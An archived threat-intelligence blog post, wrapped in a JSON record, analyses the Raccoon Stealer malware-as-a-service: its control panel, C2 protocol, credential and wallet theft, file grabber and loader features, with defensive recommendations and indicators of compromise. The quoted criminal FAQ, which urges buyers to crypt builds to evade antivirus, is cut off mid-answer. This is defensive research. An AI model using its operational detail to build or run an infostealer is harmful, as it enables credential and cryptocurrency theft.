{ "id": "a3cf0f59-7943-4c4b-b92d-88ab9fa3cb02", "created_at": "2026-04-06T00:10:59.53924Z", "updated_at": "2026-04-10T03:37:09.327827Z", "deleted_at": null, "sha1_hash": "c0dfd25d62f8d7bf789a3bce879ccd046bed2167", "title": "Raccoon Stealer Announce Return After Hiatus", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 585967, "plain_text": "Raccoon Stealer Announce Return After Hiatus\r\nBy Noel Anthony Llimos\r\nPublished: 2023-08-15 · Archived: 2026-04-05 18:03:19 UTC\r\nTable of contents\r\nIntroduction to Racoon Stealer\r\nNew Features and Updates\r\nRaccoon Stealer Control Panel\r\nRaccoon Stealer Payload\r\nRecommendations to Protect Against Raccoon Stealer\r\nCyberint and the Dark Web\r\nIndicators of Compromise\r\nAppendix A – Raccoon Stealer ‘User Agreement’\r\nAppendix B – Raccoon Stealer FAQ\r\nReferences\r\nThe author\r\nuser_image\r\nNoel Anthony Llimos\r\nImproving assessment policies and processes on safety and security in organizations is essential in outlining\r\npotential breaches and dangers to workers and properties. As an individual with a unique skill set, I have helped to\r\nidentify security measures and appropriate solutions to mitigate various security risks.\r\nTable of contents\r\nIntroduction to Racoon Stealer\r\nNew Features and Updates\r\nRaccoon Stealer Control Panel\r\nRaccoon Stealer Payload\r\nRecommendations to Protect Against Raccoon Stealer\r\nCyberint and the Dark Web\r\nIndicators of Compromise\r\nAppendix A – Raccoon Stealer ‘User Agreement’\r\nAppendix B – Raccoon Stealer FAQ\r\nReferences\r\nRelated Articles\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 1 of 18\n\nThe Targeted Exploitation of Philippine Rural Banking\r\nHow cyber risks change as financial institutions grow\r\nIntroduction to Racoon Stealer\r\nFirst observed in 2019 and advertised (Figure 1) as a ‘Malware-as-a-Service’ (MaaS) threat on various\r\ncybercriminal forums, Raccoon is an information stealer targeting victim credentials and cryptocurrency wallets.\r\nRaccoon Stealer_0\r\nSeemingly favored by some threat actors due to its simplicity, the malware element of Raccoon omits advanced\r\nfeatures, such as those used to evade detection, and instead focuses on the ‘stealer’ task in hand.\r\nWhilst this approach requires those deploying the threat to utilize third-party tools for evasion, such as cryptors or\r\npackers to thwart signature-based detection, the ongoing popularity and apparent success of Raccoon suggests that\r\nthis has not been a problem for many.\r\nLacking their own distribution method, in the past Raccoon incidents appear to have begun with the delivery of\r\nmalicious document attachments sent via an indiscriminate unsolicited email (malspam) campaign. It was also\r\nreported that Raccoon malware had dropped using third-party exploit kits and other malware families.\r\nRaccoon samples have been seen to mimic other executables although, based on their filenames, these have likely\r\nbeen distributed via sites hosting copyright-infringing materials which, in themselves, should be considered high-risk and be avoided.\r\nFurther leading to Raccoon’s continued prevalence and success, those behind this MaaS offering are lauded for\r\ntheir high levels of service, and their management dashboard, much like the malware element, is reportedly\r\nstraightforward and easy to use.\r\nIn 2019 Raccoon advertised on various cybercriminal forums with subscriptions available for $499 (US) for four\r\nmonths, $200 for one month and $75 for a ‘trial’ week. The minimal outlay combined with a positive reputation\r\nappealed to many less sophisticated threat actors, especially given the potential return on investment (ROI)\r\nfollowing the resale or abuse of stolen credentials and cryptocurrency wallets.\r\nBut yesterday, Raccoon Infostealer announced its return after a hiatus of 6 months.\r\nRaccoon Operator Post in a Hacking Forum\r\nFigure 1: Raccoon Operator Post in a Hacking Forum\r\nIn October 2022, one of its main operators named, Mark Sokolovsky, responsible for the infrastructure of the\r\nRaccoon Infostealer, was arrested in the Netherlands with an extradition request from the United States due to its\r\nrole in the operation of the Raccoon Infostealer’s malware-as-aservice or “MaaS”.\r\nWith his arrest, the FBI has collected data stolen from many computers that cybercriminals infected with Raccoon\r\nInfostealer. While an exact number has yet to be verified, FBI agents have identified more than 50 million unique\r\ncredentials and forms of identification (email addresses, bank accounts, cryptocurrency addresses, credit card\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 2 of 18\n\nnumbers, etc.) in the stolen data from what appears to be millions of potential victims around the world. The\r\ncredentials appear to include over four million email addresses.\r\nThe arrest of Mark Sokolovsky caused the Raccoon Infostealer Operators to temporarily halt the operation for fear\r\nof being indicted. As mentioned above, the Raccoon Infostealer was one of the most famous and popular\r\ninfostealer because of its relatively low price (USD$75 weekly subscription and $200 per month) and its\r\npromising features. Also known as “Racealer,” Racoon Infostealer is used to steal sensitive and\r\nconfidential information, including login credentials, credit card information, cryptocurrency wallets,\r\nand browser information (cookies, history, autofill) from almost 60 applications.\r\nNew Features and Updates\r\n1. Quick search for cookies and passes – The new Raccoon admin panel introduces a new way to\r\nsearch for URLs in the latest version. This means finding specific links in large datasets is now\r\nmuch faster, even when dealing with millions of documents and thousands of different links. The\r\nimprovement is not just a minor upgrade – it’s a significant step forward and changes in how\r\nsearches work for those who purchase Raccoon Malware, making them much quicker, even with\r\nhuge amounts of data.\r\nThis update aims to make it easier for Threat Actors to find the links they need, providing a new\r\nlevel of convenience.\r\nFigure 2: Racoon Stealer Quick Search Module\r\n2. Automatic bot blocking and panel display – A new system is now added to the infostealer to\r\ndetect unusual activity patterns, such as multiple accesses from the same IP address or range. If\r\nthis system identifies suspicious behavior, it automatically deletes records associated with those\r\nactivities and updates the information on each client pad. This makes it harder for security tools\r\nthat use automation and bots for the detection of malware.\r\nRaccoon Stealer Dashboard with Bot Blocking and Panel Display\r\nFigure 3: Raccoon Stealer Dashboard with Bot Blocking and Panel Display\r\nLegend: Green Smiley = Activity of the IP is normal. Red Smiley = High probability that bots or\r\nother automated systems created or actively used the log.\r\n3. Reporting System – This feature was added to block IP Addresses used by crawlers and bots\r\noften used by Security Practitioners to monitor Raccoon Traffic\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 3 of 18\n\nRacoon Stealer Reporting System per IP Address\r\nFigure 4: Racoon Stealer Reporting System per IP Address\r\n4. Log Statistics – With this, any Threat Actor who purchases the Raccoon Infostealer can see the\r\ntop countries by the number of logs, as in the first versions of our stealer.\r\nFigure 5: Raccoon Stealer Log Graph Feature\r\nFigure 5: Raccoon Stealer Log Graph Feature\r\nUncover your compromised credentials from the deep and dark web.\r\nFill in your business email to start.\r\nRaccoon Stealer Behavior and Capabilities\r\nRaccoon targets a wide range of applications and uses specific techniques to extract and harvest\r\ndata from those applications.\r\nAdditionally, it is observed that Raccoon performs the same procedure to extract data from its\r\ntargeted applications:\r\n• Extract the application file that contains the sensitive data.\r\n• Copy the file to a specific folder (%Temp%).\r\n• Create and write a text file to the target application’s folder with the stolen information.\r\nTo obtain and decrypt credentials from applications, Raccoon acquires and downloads the DLLs\r\nassociated with those applications.\r\nRacoon Stealer Target Applications\r\nBrowsers:\r\n• Google Chrome\r\n• Comodo Dragon\r\n• Amigo\r\n• Orbitum\r\n• Bromium\r\n• Nichrome\r\n• RockMelt\r\n• 360Browser\r\n• Vivaldi\r\n• Opera\r\n• Sputnik\r\n• Kometa\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 4 of 18\n\n• Uran\r\n• QIP Surf\r\n• Epic Privacy\r\n• CocCoc\r\n• CentBrowser\r\n• 7Star\r\n• Elements\r\n• TorBro\r\n• Suhba\r\n• Safer Browser\r\n• Mustang\r\n• Superbird\r\n• Chedot\r\n• Torch\r\n• Internet Explorer\r\n• Microsoft Edge\r\n• Firefox\r\n• WaterFox\r\n• SeaMonkey\r\n• PaleMoon\r\nEmail Clients:\r\n• ThunderBird\r\n• Outlook\r\n• Foxmail\r\nCryptocurrency:\r\n• Electrum\r\n• Ethereum\r\n• Exodus\r\n• Jaxx\r\n• Monero\r\n• Bither\r\nAfter successfully extracting data and information, Raccoon gathers all the files and collects it to a\r\nnewly created folder by the malware itself called “Log.zip”. Afterward, the file is sent to its\r\nconfigured C\u0026C server, removing all its infection traces.\r\nLog.zip Folder Created by Raccoon to Store Stolen Information\r\nFigure 6: Log.zip Folder Created by Raccoon to Store Stolen Information\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 5 of 18\n\nThe resurgence of the well-known infostealer group “Raccoon” following a hiatus has triggered alarm\r\nin the cyber security landscape, particularly within the financial sector. The return of Raccoon\r\nhighlights the potential danger for industries like finance, which are prime targets for data breaches\r\nand financial fraud.\r\nRaccoon Stealer Control Panel\r\nHosted on a Tor onion service, Raccoon subscribers have access to a centralized control panel from which they\r\ncan generate and/or manage campaign configurations, build Raccoon malware payloads, and view data stolen\r\nfrom victims.\r\nDisplayed in English by default, although also available in Russian, visitors to the control panel are prompted to\r\nlog in using the username and password (Figure 2) they presumably received when subscribing.\r\nRaccoon Stealer dashboard login\r\nFigure 7 – Dashboard login\r\nVisitors can also view the Support page, without authentication, that provides both Jabber and Telegram contact\r\ndetails for those who are behind this MaaS threat (Figure 8).\r\nRaccoon Stealer_support contacts\r\nFigure 8 – Support contacts\r\nGiven the inability to purchase access through this official control panel, threat actors seeking access would\r\npresumably need to initiate contact with the Raccoon team, via their forum posts or using the contact details above\r\nto ‘subscribe’.\r\nAlthough access to this control panel requires an active Raccoon subscription and credentials, screenshots\r\npreviously shared by the threat actor provide an insight into its interface and functionality based on the available\r\nmenu options (Figure 9)\r\nRaccoon Stealer menu options\r\nFigure 9 – Menu options\r\nNotably, the control panel makes use of JavaScript resources (Figure 10) that can be accessed without\r\nauthentication and allows some of the current functionality to be determined, including features that would likely\r\nrequire administrative access.\r\nRaccoon Stealer Control panel HTML including the 'revealing' JavaScript resource\r\nFigure 10 – Control panel HTML including the ‘revealing’ JavaScript resource\r\nIn addition to this, the JavaScript exposes text related to the user agreement and FAQ sections, both of which are\r\nprovided within the appendices for reference.\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 6 of 18\n\nAdministrative Options\r\nBased on an analysis of the exposed JavaScript resource, the following additional menu options appear to be\r\navailable to Raccoon’s administrators:\r\nAll logs\r\nAll statistics\r\nNews\r\nProxies\r\nUsers\r\nPotentially leaving a subscriber unaware of their malware deployment’s success, code references related to the\r\n‘All logs’ and ‘All statistics’ options appear to provide Raccoon administrators with the ability to access and/or\r\ndelete data processed by the platform.\r\nTheoretically allowing administrators to have their pick of any victim data, it would likely be naive to think that\r\nthis would not be the case and may therefore be one cost of doing business with other cybercriminals, especially\r\ngiven the adage that there is no honor amongst thieves.\r\nCommonly used for anonymization, even though the intent is not obvious from the JavaScript (Figure 11) and\r\nmay be related to their gate infrastructure, the ‘Proxy’ option enables Raccoon administrators to add, remove and\r\ntest proxies, including running checks against ‘VT’ (presumably VirusTotal) as well as assigning them to and from\r\nusers.\r\nRaccoon Stealer Proxy functionality available to control panel administrators\r\nFigure 11 – Proxy functionality available to control panel administrators\r\nGiven that the Raccoon malware component does not appear to upload stolen data directly to this Tor onion site, it\r\nis possible that the proxy configuration is used to mask the exfiltration process to intermediate infrastructure,\r\nalthough, without further analysis, this is currently speculation.\r\nFinally, the remaining administrative options are likely more self-explanatory with the ‘News’ option facilitating\r\nthe creation of news articles or notifications and the ‘Users’ option providing subscriber management.\r\nStatistics/Account\r\nLikely displayed upon login and the default page for a subscriber visiting the control panel, the Statistics panel\r\nprovides an at-a-glance overview of active campaigns (Figure 12).\r\nRaccoon Stealer Management control panel 'Statistics' and 'Account\r\nFigure 12 – Management control panel ‘Statistics’ and ‘Account\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 7 of 18\n\nAdditionally, the Account section displays the current Main and Bonus balances, likely related to subscription\r\nfunds, alongside options that allow the control panel interface to be switched between light and dark modes, the\r\nconfiguration of two-factor authentication, and a password reset function.\r\nNotably, the ‘Check wallets’ option visible in the screenshot does not appear to be referenced by the current\r\nJavaScript resource and may have been removed. Whilst vague, this option may have provided the ability to\r\ndetermine the value of stolen cryptocurrency wallets, such as via public blockchain services, although with an\r\nincrease in targeted currencies it may no longer be relevant.\r\nLogs\r\nSeemingly enhanced since Raccoon’s initial release, victim data presented within a legacy screenshot (Figure 13)\r\nis consistent with the malware’s current capabilities but lacks additional columns identified from an analysis of the\r\ncurrently deployed JavaScript resource.\r\nRaccoon Stealer Management control panel 'Log\r\nFigure 13 – Management control panel ‘Logs’\r\nBased on the current control panel, it appears that the ‘Logs’ table now shows the following headers:\r\nGEO – Country code based on victim IP address geolocation.\r\nIP – Victim IP address.\r\nUSR – Implies ‘username’ but may be another unique victim identifier (references ‘bot_id’).\r\nUTC – Victim system time.\r\nUA – Victim browser user-agent strings.\r\nPWD – Number of acquired victim passwords.\r\nCKE – Number of acquired victim cookies.\r\nCC – Number of acquired victim credit card details.\r\nWLT – Number of acquired victim cryptocurrency wallets.\r\nTAG – Likely a user-customizable tag feature.\r\nDAT – Potentially identifies date/time the data was acquired (references ‘create_data_unix’).\r\nUSR – Seemingly duplicated header displaying the victim’s username.\r\nCOM – Customizable comment field.\r\nGET – Displays the exfiltrated file size and allows the Zip archive to be downloaded.\r\nACT – Additional ‘actions’ including the ability to delete the stolen data.\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 8 of 18\n\nA comprehensive search capability is also provided within the Logs section (Figure 14) that, given the presence of\r\nan elasticsearch_id string within the JavaScript, may indicate that the control panel is using Elasticsearch to\r\nstore stolen data.\r\nRaccoon Stealer Log search capability\r\nFigure 14- Log search capability\r\nBuilds/Config\r\nUndoubtedly used to configure and create Windows executables that contain the Raccoon stealer payload, the\r\nJavaScript resource provides an indication of the functionality present in the Builds and Configs sections of the\r\ncontrol panel.\r\nBased on the FAQ, subscribers have the ability to generate a single build, although multiple configurations are\r\nsupported as these can be updated and downloaded from the C2 infrastructure mid-campaign. In addition to\r\npreventing subscriber abuse, such as account sharing or usage after license expiration, this eliminates the need for\r\nsubscribers to rebuild their payload after making subtle configuration changes.\r\nHaving assigned a name to their configuration, the following options can be set:\r\nScreenshots – Disabled by default; takes a screenshot of the victim desktop.\r\nBrowser history – Disabled by default; gathers 1,000 lines of recent web-browser history.\r\nSelf removal – Automatically removes Raccoon stealer after data exfiltration.\r\nFile loader URLs – Download and execute additional payloads on the victim host after data\r\nexfiltration.\r\nAdditionally, ‘file grabber rules’ can be configured to allow collection and exfiltration of files from victim hosts\r\nbased on the following conditions:\r\nPath – Starting directory on the victim host from which to start the ‘file grabber’; for example:\r\nC:\\ .\r\nMask – Comma-delimited list of filename masks including wildcards; for example: *.doc,*.xls .\r\nSize Limit – Maximum size per file (up-to 100mb), in kilobytes; for example 150kb would be:\r\n150 .\r\nExceptions – Directories, within the specified path, to excluded from searches, for example:\r\n\\Windows\\ .\r\nSubfolders – Presumably enabling or disabling searches within subdirectories.\r\nShortcuts – Collect matching files referenced by shortcuts; for example, file.doc.lnk would\r\ndownload the corresponding file.doc .\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 9 of 18\n\nAfter defining and selecting a configuration, the build process allows the creation of either a dynamic link library\r\n(DLL) or executable (EXE) that would enable the threat actor to deliver and launch the payload using their\r\npreferred method.\r\nAs a somewhat professional touch, and likely contributing toward the positive opinion of Raccoon, a test feature\r\nallows this newly built payload to be tested in a virtual machine maintained by the Raccoon team. Presumably\r\nused to check that the payload successfully executes and communicates with the C2 infrastructure, the conclusion\r\nof this test reportedly results in a notification being sent to the subscriber via the control panel.\r\nConsistent with many other Russian-language cybercriminal threats, attention is drawn to the fact that Raccoon\r\nstealer will not function on victim hosts that are determined as being within the Commonwealth of Independent\r\nStates (CIS) based on their system locale (language) or IP address. Subscribers are also reminded to ‘crypt’ their\r\nbuilds to evade detection and to ‘keep in mind’ that long-term use could increase the chances of detection (Figure\r\n15).\r\nRaccoon Stealer build/Config warnings\r\nFigure 15 – Build/Config warnings\r\nRaccoon Stealer Payload\r\nHaving tested and secured their payload, the threat actor will need to deliver Raccoon to would-be victims.\r\nBased on observations of recent activity, many appear to favor using malicious document attachments sent via\r\nunsolicited email (malspam) campaigns, potentially linked to the use of third-party exploit kits or other malware\r\nfamilies, as well as Raccoon payloads being uploaded to file-sharing sites, such as those hosting copyright-infringing materials, and/or mimicking other executables.\r\nCommand \u0026 Control\r\nBased on the intelligence gathered from the Raccoon Stealer control panel, each payload will attempt to\r\ncommunicate with some seemingly benign or legitimate URL from which an encrypted string is gathered and\r\nprocessed to obtain the true command and control (C2) URL, typically comprised of an IP address and potentially\r\na /gate/log.php resource.\r\nAs detailed in a February 2020 analysis, Raccoon previously hid this C2 server address in an encrypted string that\r\nposed as a filename hosted on Google Drive, even though this is seemingly no longer the case.\r\nBased on analysis of recent payloads, Raccoon currently communicates with websites offering Telegram URL\r\nshortening services. Upon access, the profile overview of a threat actor-controlled Telegram user is displayed\r\n(Figure 16) with the ‘description’ field containing an encrypted C2 string.\r\nRaccoon Stealer example telegram user details\r\nFigure 16 – Example Telegram user details\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 10 of 18\n\nParsing this HTML response, Raccoon locates the encrypted C2 URL by locating the preceding string\r\ndescription\" dir=\"auto\"\u003e (Figure 17).\r\nRaccoon Stealer telegram user details HTML (Yellow: element search; Red: encoded string\r\nFigure 17 – Telegram user details HTML (Yellow: element search; Red: encoded string)\r\nWhile this feature allows the C2 servers to be easily updated, the use of third-party Telegram URL shortening\r\nservices rather than the legitimate service ( https://t[.]me/\u003cGROUP|USER\u003e ) allows defenders to detect and block\r\nanomalous behavior, especially given the low-reputation domains that these are hosted on.\r\nHaving decrypted and decoded the encrypted C2 URL, using its own XOR cipher routines, Raccoon calls home\r\nvia a HTTP POST containing three parameters hidden in a base64 encoded and RC4 encrypted string (Figure 18):\r\nb= – Bot identifier, comprised of the victim ‘machine GUID’, as found in the Windows registry,\r\nan underscore and the victim username.\r\nc= – Configuration identifier, a hexadecimal string or hash that refers to a specific threat actor’s\r\nconfiguration.\r\nf= – Configuration file format, only observed as being set to ‘JSON’.\r\nRaccoon Stealer_12-1\r\nFigure 18 – Example C2 HTTP POST\r\nIn response, the C2 server sends a JSON configuration, also base64 encoded and RC4 encrypted with the\r\nsame passphrase, containing the following values (Figure 19):\r\n_id – Identifier, potentially related to the threat actor or some combination of victim and/or\r\nconfiguration.\r\nau – Previously known as attachment_url , specifies the C2 path containing supporting files\r\nused by the Raccoon payload such as sqlite3.dll .\r\nls – Previously known as libraries , supporting files for the Raccoon payload.\r\nip – Victim IP address.\r\nlocation – Victim IP geolocation, contains country , country_code , state , state_code ,\r\ncity , zip , latitude and longitude .\r\nc – Previously known as the config section, contains:\r\nm – Previously known as masks , specifies any file search masks used for data\r\ntheft.\r\nlu – Previously known as loader_urls , specifies any additional payloads to be\r\ndownloaded and executed after the conclusion of Raccoon’s data exfiltration.\r\nlu – Seemingly a second loader_urls value.\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 11 of 18\n\nrm – Disables ( 0 ) or enables ( 1 ) the self-removal feature.\r\nis_screen_enabled – Disables ( 0 ) or enables ( 1 ) the screenshot feature.\r\nis_history_enabled – Disables ( 0 ) or enables ( 1 ) the browser history acquisition feature.\r\ndepth – Undetermined, potentially a path depth used to limit the file search mask feature.\r\nRaccoon Stealer c2 response\r\nFigure 19 – Example C2 response\r\nData Theft\r\nRaccoon stealer can extract credentials, cookies and payment card data from a number of applications including\r\nthe following as identified from recently analyzed samples:\r\nBrowsers: Google Chrome, Mozilla Firefox, Opera and those that are Chromium-based including\r\nMicrosoft Edge.\r\nCryptocurrency Wallets: Electron Cash, Electrum-LTC, Ethereum, Exodus, Guarda, Jaxx Liberty,\r\nMetaMask and MyMonero\r\nNotably, to gather other cryptocurrency wallets, Raccoon also searches for the commonly used filename\r\nwallet.dat .\r\nUtilizing dynamic link libraries (DLL) downloaded from C2 paths specified in the JSON configuration and saved\r\nto %USERPROFILE%\\AppData\\LocalLow\\ , supporting files allow access to data stored by the targeted applications.\r\nFor example, recent campaigns have been observed as deploying the legitimate SQLite file sqlite3.dll\r\nallowing access to browser data stored within SQLite databases.\r\nIn addition to data theft, Raccoon gathers system information that is saved in a file named machineinfo.txt and\r\nincludes details of the build version, operating system, hardware and installed applications (Figure 20).\r\nRaccoon Stealer macineinfo.txt\r\nFigure 20 – Example machineinfo.txt file\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 12 of 18\n\nHaving completed both the data theft and information gathering stages, Raccoon generates an exfiltration Zip\r\narchive in %USERPROFILE%\\AppData\\LocalLow\\ using the configuration _id value followed by .zip as the\r\nfilename rather than Log.zip as previously.\r\nOnce prepared, this archive is uploaded to a C2 gate server, notably without encryption, via a HTTP POST.\r\nPresumably confirming the upload, the server responds with a forty-character hexadecimal string, potentially\r\nsome SHA1 hash or checksum, before allowing Raccoon to act on any final configuration such as self-removal or\r\nthe download and execution of additional payloads.\r\nAdditional Payloads\r\nGiven the file loader capability provided by Raccoon, it is possible for a threat actor to initiate the download and\r\nexecution of additional payloads once the stealer has completed its data exfiltration.\r\nWhile these payloads will undoubtedly change depending on each threat actor’s requirements, recent observations\r\ninclude the deployment of additional malware, such as those used to gain and maintain remote access, as well as\r\ncrypto-jacking payloads that abuse a compromised host’s computational power to mine cryptocurrencies including\r\n‘Ether’.\r\nIn the latter case, crypto-jacking payloads typically join a shared pool and will likely generate significant\r\ncryptocurrency incomes for the threat actor given enough victims.\r\nFurthermore, those behind Raccoon announced the beta release of a module on April 23, 2021 (Figure 21) named\r\nRaccoon Clipper that currently targets Bitcoin (BTC), Dogecoin (DOGE), Ethereum (ETH), Litecoin (LTC) and\r\nMonero (XMR) cryptocurrency wallets.\r\nRaccoon Stealer announcement\r\nFigure 21 – ‘Raccoon Clipper’ forum announcement\r\nBased on a promotional video released alongside this announcement (Figure 22), this module allows legitimate\r\npayment addresses within cryptocurrency applications to be replaced surreptitiously resulting in victims\r\ninadvertently making payments to a cryptocurrency address belonging to the threat actor.\r\nRaccoon Stealer promo video\r\nFigure 22 – Promotional video (Left: Legitimate address removed; Right: Threat Actor address inserted)\r\nInformation stealer malware constitutes a persistent and adaptive threat that demands an intricate\r\nresponse from cybersecurity. Several key strategies emerge as these malicious tools continuously\r\nrefine their techniques to target sensitive data across individuals, businesses, and industries.\r\nOrganizations must adopt an agile defense approach that combines advanced endpoint security,\r\nrobust network monitoring, and proactive threat intelligence sharing to counter information stealer\r\nmalware effectively.\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 13 of 18\n\nAdditionally, highlighting the importance of user awareness and adherence to data protection\r\nregulations is very crucial. By prioritizing comprehensive training, strengthening security measures,\r\nand practicing collaboration among security professionals, organizations can establish a more resilient\r\ndefense against the evolving tactics of information stealer malware. This proactive stance and the\r\nintegration of cutting-edge technologies will better equip the cybersecurity community to safeguard\r\nagainst these persistent threats and minimize potential breaches.\r\nRecommendations to Protect Against Raccoon Stealer\r\nDevelop and enforce a comprehensive security policy that outlines best practices for employees, including\r\nguidelines on password management, email usage, and software updates.\r\nProvide regular security awareness training to employees to educate them about the risks of infostealer\r\nmalware, phishing attacks, and safe online practices.\r\nImplement robust endpoint security solutions, including advanced antivirus and anti-malware software, to\r\ndetect and prevent infostealer infections on devices used within the organization.\r\nEnsure that email security controls are applied to limit the delivery of potentially malicious attachments or\r\nlinks to end-users, as well as implementing protocols and security controls such as DKIM, DMARC and\r\nSPF.\r\nEnforce using MFA for accessing sensitive systems and applications, adding an extra layer of security even\r\nif credentials are compromised.\r\nDevelop and regularly update an incident response plan that outlines the steps to take in case of an\r\ninfostealer malware incident. This plan should include isolation, containment, eradication, and recovery\r\nprocedures.\r\nConduct regular security audits and assessments to ensure that your security practices align with industry\r\nstandards and regulation.\r\nThose using cryptocurrencies should consider the use of hardware-based wallets and ensure that payment\r\naddresses are verified before submitting a transaction.\r\nCyberint and the Dark Web\r\nCyberint excels in accessing high-tier sources that remain elusive to most companies. Our unique ability to\r\npenetrate these hidden corners enables us to collect and analyze invaluable data. We enrich our automated\r\ncollection with a human approach, through research and analysis of our military-grade expert team.\r\nFind new sources in deep and dark web marketplaces, forums, and sites, even if those sources are volatile\r\nand difficult to track. Get deep analysis and reports, that allow you to understand a specific threat actor and\r\ngroup profiling, including the places of operation, targeted countries or verticals, TTPs and more. Get a\r\ndemo and see what assets you have exposed on the deep \u0026 dark web.\r\nIndicators of Compromise\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 14 of 18\n\nSHA256 Hashes\r\nThe following samples were observed in May 2021 and may be beneficial for those seeking to further understand\r\nthe nature of this threat:\r\n012e382049b88808e2d0b26e016dc189f608deea9b6cc993ce24a57c99dd93d1\r\n18c27b85f26566dd782171e00ea5b5872546b23526cca0ebb185caca35fdec93\r\n24499fbfd8a2b2663899841f3cf424b60d60c26351b5d491fd475adf9e301256\r\n3c5120a6e894b64924dc44f3cdc0da65f277b32870f73019cefeacf492663c0e\r\n40175d0027919244b6b56fe5276c44aba846d532501e562da37831403c9ed44e\r\n624b7ae8befcf91dbf768d9703147ac8f9bd46b08ffe14a75c77e88736bf07d0\r\n75c3a83073d9b15d4f47308b5d688f1ec07422419e3bd54e78f6ef8683d42e5c\r\n8815b21c44c22aec31f7fa6e69dcb83a60c572f8365ff02b5c6f12154e01a4c2\r\n97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9\r\na2420c7f0c7bf5d3c0893aff6b7440a09c0531632434d2bbb6f8ed98b04317b9\r\nbfb37c9adc809e880f56dd10898b5425242330d6e2fa69e014a98e6dc18ce416\r\ncaf3eca514de58e215b5e9f568f748293be64a3c82e15c2f905903cd9bfacc1c\r\nde7ccff53ca27db1ed1e3e0d0df07f2e3364ec6b7e60622dc7726cba56831eb7\r\nDomains\r\ntelete[.]in – Initial ‘call home’ to an unofficial Telegram service\r\ntelecut[.]in – Suspicious domain related to telete[.]in\r\ntgraph[.]io – Suspicious domain related to telete[.]in\r\ntttttt[.]me – Initial ‘call home’ to an unofficial Telegram service\r\ntelegram[.]cat – Suspicious domain related to tttttt[.]me\r\ntelegram[.]services – Suspicious domain related to tttttt[.]me\r\ntlgr[.]org – Suspicious domain related to tttttt[.]me\r\nxn--r1a[.]click ( т[.]click ) – Suspicious domain related to tttttt[.]me\r\nxn--r1a[.]link ( т[.]link ) – Suspicious domain related to tttttt[.]me\r\nxn--r1a[.]live ( т[.]live ) – Suspicious domain related to tttttt[.]me\r\nxn--r1a[.]site ( т[.]site ) – Suspicious domain related to tttttt[.]me\r\nxn--r1a[.]website ( т[.]website ) – Suspicious domain related to tttttt[.]me\r\nIP Addresses\r\n195.201.225[.]248 – Resolves to telete[.]in and related domains\r\n95.216.186[.]40 – Resolves to tttttt[.]me and related domains\r\nURLs\r\nhxxps://telete[.]in/jiocacossa\r\nhxxps://tttttt[.]me/kokajakprozak\r\nhxxps://tttttt[.]me/antitantief3\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 15 of 18\n\nhxxps://telete[.]in/baudemars\r\nhxxps://telete[.]in/bpa1010100102\r\nhxxps://tttttt[.]me/brikitiki\r\nhxxps://tttttt[.]me/ch0koalpengold\r\nContact usto learn more about how threat intelligence can protect your business.\r\nAppendix A – Raccoon Stealer ‘User Agreement’\r\nExtracted from the currently deployed Raccoon Stealer control panel, the following text is presented as the ‘User\r\nAgreement’ that subscribers must accept.\r\nUser agreement\r\nBy paying (by becoming a customer) Raccoon Stealer (hereinafter referred to as the service) you agree\r\nThis user agreement is final and non-negotiable.\r\nOur service does not work and will never be in the CIS. Discussion of this in the chat will be punish\r\nWe are only responsible for the correct operation of our service. No third-party services apply to th\r\nWe are not responsible for the ratio, because a huge number of elements are involved in the process o\r\nWe are not responsible for logs stored in our panel for more than 2 months. Logs of inactive clients\r\nAppendix B – Raccoon Stealer FAQ\r\nExtracted from the currently deployed control panel, the following text is presented as a frequently asked\r\nquestions (FAQ) page for subscribers.\r\nQ0. How long do you store logs if my account is inactive?\r\nA0. We are not responsible for logs stored in our panel for more than 2 months. Logs of inactive clients are del\r\nQ1. Where can I find info about my account and set it up?\r\nA1. Click on your nick on the sidebar. This is your profile. You can see your install statistics there. Also lic\r\nQ2. How can I protect my account?\r\nA2. You can change your password in your profile settings. Also you can set up 2FA for your account.\r\nQ3. How do I know about your product updates?\r\nA3. Click on News button on the sidebar. If you haven't read messages yet, you will see red circle sign. Importa\r\nQ4. How to test and download my build?\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 16 of 18\n\nA4: Click on Build button on the sidebar. Click on the Add Build button on the top of the menu. Your build will\r\nQ5. In what file formats is your build available?\r\nA5. In *.EXE and *.DLL\r\nQ6. Does your build work at Low Integrity Level?\r\nA6. Yes!\r\nQ7. Must I crypt your build?\r\nA7. It's necessary. By using clean build you increase AV detects quantity. It will affect your results and resul\r\nQ8. Why must I test the build?\r\nA8. We always ask our users to make these steps:\r\n 1) Test with 'test button' in panel\r\n 2) Test on virtual or real Windows machine\r\n 3) Check log archive from Windows machine if everything is stealed fine\r\nQ9. Should I generate new build after gate change, update, etc.?\r\nA9. No! This is our difference from other info-stealing software. You can keep working with same build and it wi\r\nQ10. Why can I generate only one build?\r\nA10. This was made to avoid speculation and use of the account by several people. We are planning to add multi-b\r\nQ11. How to create and use configs?\r\nA11: On the top of the \"Builds\" you can see \"Add config\" button. You must add config name. After that you can ch\r\nQ12. Must I generate new build after config change?\r\nA12. No. Raccoon loads configuration from the server. You can edit your config on the go with no rebuild require\r\nQ13. Does Raccoon work on CIS PC's?\r\nA13. No for all. If you run Raccoon of PC with CIS language or IP, it will stop working. Don't be surprised with\r\n No! And don't even ask about it. Also notice if you will run our file on RU or CIS machine nothing will hap\r\nQ14. How can I save my search parameters?\r\nA14: Just fill \"Mask name\" box and make a search. Button with your search template will appear on the top of you\r\nQ15. What do logs 